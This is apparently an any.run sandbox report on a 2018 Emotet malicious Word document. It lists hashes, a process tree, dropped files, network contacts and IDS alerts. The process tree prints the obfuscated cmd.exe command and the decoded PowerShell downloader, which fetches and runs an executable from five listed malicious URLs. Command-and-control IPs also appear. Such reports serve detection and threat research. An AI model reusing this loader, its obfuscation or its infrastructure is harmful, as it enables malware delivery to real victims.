File name: | 121920189I906553.doc |
Full analysis: | https://app.any.run/tasks/98ea69a1-c85f-44c3-8741-57b73c67cecc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 19, 2018, 02:47:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:15:00 2018, Last Saved Time/Date: Tue Dec 18 20:15:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 2A771EF11F2BBB7BEDF0394ED08ADAA3 |
SHA1: | A063644A469D14C083464DA1B9E86D154B0C77F5 |
SHA256: | 3C18597017EF58FEE97F8B28879DABEEC6DAE7A968A56A891D07D1DC52DDC3AF |
SSDEEP: | 1536:bd81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadugQ8UUaovoU+a9:bd8GhDS0o9zTGOZD6EbzCdugQ8/o |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 20:15:00 |
ModifyDate: | 2018:12:18 20:15:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3464 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\121920189I906553.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2616 | c:\i0651860547267\h3249438289644\Q4051730915624\..\..\..\windows\system32\cmd.exe /c %pRogRaMdATa:~0,1%%prOGraMdATA:~9,2% /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | C%appdAtA:~-4,1%%sYSTeMrooT:~-4,-3% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3140 | CmD /V:On /C " sET AP=;'378s'=811a$}}{hctac}};kaerb;'416I'=713D$;650T$ metI-ekovnI{ )00008 eg- htgnel.)650T$ metI-teG(( fI;'499O'=403E$;)650T$ ,554A$(eliFdaolnwoD.714o${yrt{)105C$ ni 554A$(hcaerof;'exe.'+846j$+'\'+pmet:vne$=650T$;'610Q'=557f$;'876' = 846j$;'316G'=988C$;)'@'(tilpS.'HISlYGVwv/slianbmuhTpw/segami/lortnocemoh/moc.gnisiurctsuj//:ptth@44lqDch2/ten.ngisedycal//:ptth@ttcvje2by5/moc.ennaojybedam//:ptth@xxaiBq8Ga/moc.zepolohcnap//:ptth@qFAy6Zuy/moc.syskilk//:ptth'=105C$;tneilCbeW.teN tcejbo-wen=714o$;'234w'=126j$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop& FOr /l %3 iN ( 554 -1 0)do SET 7ne=!7ne!!AP:~ %3, 1!&IF %3 == 0 ecHO !7ne:~5! | Cmd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3240 | C:\Windows\system32\cmd.exe /S /D /c" ecHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3308 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3752 | powershell $j621='w432';$o417=new-object Net.WebClient;$C501='http://kliksys.com/yuZ6yAFq@http://pancholopez.com/aG8qBiaxx@http://madebyjoanne.com/5yb2ejvctt@http://lacydesign.net/2hcDql44@http://justcruising.com/homecontrol/images/wpThumbnails/vwVGYlSIH'.Split('@');$C889='G613';$j648 = '678';$f755='Q016';$T056=$env:temp+'\'+$j648+'.exe';foreach($A455 in $C501){try{$o417.DownloadFile($A455, $T056);$E304='O994';If ((Get-Item $T056).length -ge 80000) {Invoke-Item $T056;$D317='I614';break;}}catch{}}$a118='s873'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2792 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | — | powershell.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3552 | "C:\Users\admin\AppData\Local\Temp\678.exe" | C:\Users\admin\AppData\Local\Temp\678.exe | 678.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
2948 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 678.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3564 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA626.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6A02F1C.wmf | — | |
MD5:— | SHA256:— | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82E68F8A.wmf | — | |
MD5:— | SHA256:— | |||
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTVI7N2JDQ0EC273D0HY.temp | — | |
MD5:— | SHA256:— | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB1587C7.wmf | wmf | |
MD5:EDB2F62BADC35E507F10B2FAEECC571F | SHA256:57A15807E410C55271B1738DE2312D61174E4126E049051484FB241B430DF3DD | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82A38C6D.wmf | wmf | |
MD5:89AE3A598DC8A6F06B80197617FD3C2B | SHA256:8F959A1B99F7F9A36C972CC4B2E5BA0F22B2C3B54758B1A91F9D36B32B7D4B85 | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B0BB6497035BCC6F81088AD619123F2C | SHA256:F83CA978E449F70CD3D6FAF4B1D4F7D55D46F5011797B3F9B1766C03B912ED82 | |||
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3752 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b53a.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3552 | 678.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:84192E89E1B2AF10D1F6CCCBD06EF355 | SHA256:EE2699909F938CD5A35535FA372C36E88163D9C3971283ADAA6F7EF0CD8A2795 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3752 | powershell.exe | GET | 200 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq/ | CA | executable | 124 Kb | malicious |
3564 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
3752 | powershell.exe | GET | 301 | 158.69.193.16:80 | http://kliksys.com/yuZ6yAFq | CA | html | 236 b | malicious |
3564 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3564 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3564 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3752 | powershell.exe | 158.69.193.16:80 | kliksys.com | OVH SAS | CA | suspicious |
3564 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3564 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation |
---|---|---|
kliksys.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3752 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3564 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3564 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3564 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3564 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |